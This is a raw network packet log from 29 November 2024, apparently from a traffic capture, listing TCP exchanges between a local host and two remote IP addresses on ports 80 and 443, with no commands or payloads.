                                                                                                                                                                                    Nov 29, 2024 19:49:38.179239035 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.179244995 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.179936886 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.180063963 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.180103064 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.181018114 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.181139946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.181179047 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.181880951 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.181916952 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.182082891 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.182104111 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.182213068 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.182252884 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.182666063 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.182687044 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.182821035 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.182822943 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.182836056 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.183185101 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.183188915 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.183198929 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.183336020 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.183456898 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.184278011 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.184381962 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.184428930 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.185380936 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.185503006 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.185554028 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.186443090 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.186548948 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.186585903 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.187530994 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.187591076 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.187639952 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.188661098 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.189022064 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.189208984 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.189709902 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.189851999 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.189892054 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.190800905 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.190926075 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.190969944 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.191884995 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.191982985 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.192028999 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.192962885 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.193015099 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.193094969 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.193878889 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.194118977 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.194312096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.194353104 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.195135117 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.195269108 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.195393085 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.196217060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.196270943 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.196597099 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.196609020 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.197299004 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.197417021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.197546959 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.198416948 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.198532104 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.198662996 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.199465036 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.199580908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.199620962 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.200532913 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.200656891 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.200697899 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.201649904 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.201715946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.201781034 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.202692986 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.202814102 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.202853918 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.203808069 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.203911066 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.203955889 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.204916000 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.205106020 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.205144882 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.206049919 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.206193924 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.206290960 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.207081079 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.207199097 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.207261086 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.207634926 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.208137035 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.208235025 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.208271980 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.209225893 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.209357023 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.209469080 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.210355997 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.210486889 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.210532904 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.210942030 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.211437941 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.211514950 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.211710930 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.212488890 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.212629080 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.212671995 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.213576078 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.213673115 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.213726997 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.214658976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.214720964 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.214773893 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.215744019 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.215851068 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.215889931 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.216828108 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.216941118 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.216985941 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.217912912 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.218121052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.218164921 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.219017029 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.219110012 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.219186068 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.220088959 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.220199108 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.220433950 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.221174955 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.221327066 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.221520901 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.222290993 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.222332001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.222379923 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.223332882 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.223478079 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.223534107 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.224441051 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.224554062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.224597931 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.225516081 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.225620031 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.225665092 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.226593018 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.226691961 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.226737022 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.227670908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.227787018 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.227830887 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.228813887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.228898048 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.228955984 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.229829073 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.229954958 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.229996920 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.230958939 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.231182098 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.231311083 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.232024908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.232125998 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.232168913 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.233135939 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.233217001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.233268023 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.234194040 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.234313011 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.234359026 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.235318899 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.235424995 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.235471010 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.236360073 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.236535072 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.236581087 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.237466097 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.237584114 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.237627983 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.238548040 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.238660097 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.238703966 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.313879967 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.314039946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.314093113 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.314466953 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.314616919 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.314656019 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.315543890 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.315670013 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.315715075 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.316638947 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.316735029 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.316780090 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.317728996 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.317850113 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.317897081 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.318825960 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.319035053 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.319225073 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.319874048 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.319982052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.320034027 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.320959091 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.321019888 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.321063995 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.322051048 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.322160959 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.322201967 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.323128939 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.323247910 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.323290110 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.324191093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.324299097 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.324408054 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.325455904 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.325560093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.325613022 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.326312065 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.326427937 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.326538086 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.327380896 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.327450037 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.327497959 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.328350067 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.328419924 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.328464031 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.329396963 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.329514980 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.329562902 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.330430984 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.330502987 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.330545902 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.331403017 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.331505060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.331556082 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.332406044 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.332479954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.332532883 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.333420992 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.333451033 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.333503008 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.334378004 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.334486008 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.334533930 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.335340977 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.335458994 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.335539103 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.336348057 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.336479902 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.336533070 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.337259054 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.337491989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.337538004 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.338248968 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.338356018 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.338404894 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.339143991 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.339246988 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.339288950 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.340137959 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.340378046 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.340456963 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.341100931 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.341152906 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.341208935 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.341989994 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.342155933 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.342207909 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.342910051 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.342943907 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.343071938 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.343818903 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.343941927 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.344244003 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.344727039 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.344846964 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.344894886 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.345663071 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.345810890 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.345863104 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.346045017 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.346606016 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.346656084 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.346662998 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.346668959 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.346709967 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.347181082 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.347193956 CET4434976413.107.246.63192.168.2.6
